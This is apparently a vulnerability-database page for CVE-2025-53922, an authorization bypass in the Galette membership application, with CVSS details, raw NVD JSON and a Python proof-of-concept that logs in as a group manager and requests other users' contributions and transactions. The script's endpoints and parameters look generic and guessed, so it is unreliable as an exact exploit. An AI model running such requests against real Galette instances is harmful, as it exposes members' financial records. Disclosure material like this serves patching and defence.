Security Vulnerability Report
中文
CVE-2025-53922 CVSS 4.9 MEDIUM

CVE-2025-53922

Published: 2025-12-19 16:15:57
Last Modified: 2026-01-02 14:55:02
Source: [email protected]

Description

Galette is a membership management web application for non profit organizations. Starting in version 1.1.4 and prior to version 1.2.0, a user who is logged in as group manager may bypass intended restrictions on Contributions and Transactions. Version 1.2.0 fixes the issue.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:* - VULNERABLE
Galette >= 1.1.4
Galette < 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53922 PoC - Authorization Bypass in Galette # Target: Galette versions 1.1.4 to < 1.2.0 # Attack Vector: Group Manager bypasses access controls on Contributions/Transactions import requests import sys from bs4 import BeautifulSoup TARGET_URL = "http://target-galette.com" USERNAME = "group_manager_user" PASSWORD = "password123" def exploit_cve_2025_53922(): """ This PoC demonstrates the authorization bypass vulnerability where a group manager can access Contributions and Transactions they shouldn't have access to. """ session = requests.Session() # Step 1: Login as group manager login_url = f"{TARGET_URL}/login" login_data = { "login": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data) if "logout" not in response.text.lower(): print("[-] Login failed") return False print("[+] Logged in as group manager") # Step 2: Try to access other users' contributions (bypass check) contributions_url = f"{TARGET_URL}/contributions" params = { "user_id": "other_user_id", # Target another user's data "ajax": "true" } response = session.get(contributions_url, params=params) # Step 3: Try to access transactions transactions_url = f"{TARGET_URL}/transactions" response = session.get(transactions_url, params=params) if response.status_code == 200 and "contribution" in response.text.lower(): print("[+] Authorization bypass successful - accessed unauthorized data") print("[+] Vulnerability CVE-2025-53922 is present") return True else: print("[-] Access denied or data not found") return False if __name__ == "__main__": exploit_cve_2025_53922()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53922", "sourceIdentifier": "[email protected]", "published": "2025-12-19T16:15:56.973", "lastModified": "2026-01-02T14:55:01.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Galette is a membership management web application for non profit organizations. Starting in version 1.1.4 and prior to version 1.2.0, a user who is logged in as group manager may bypass intended restrictions on Contributions and Transactions. Version 1.2.0 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.4", "versionEndExcluding": "1.2.0", "matchCriteriaId": "8EB5DB2F-B2F7-4ED4-95D9-2D12F0508F21"}]}]}], "references": [{"url": "https://github.com/galette/galette/security/advisories/GHSA-5jp7-5c38-3pv6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.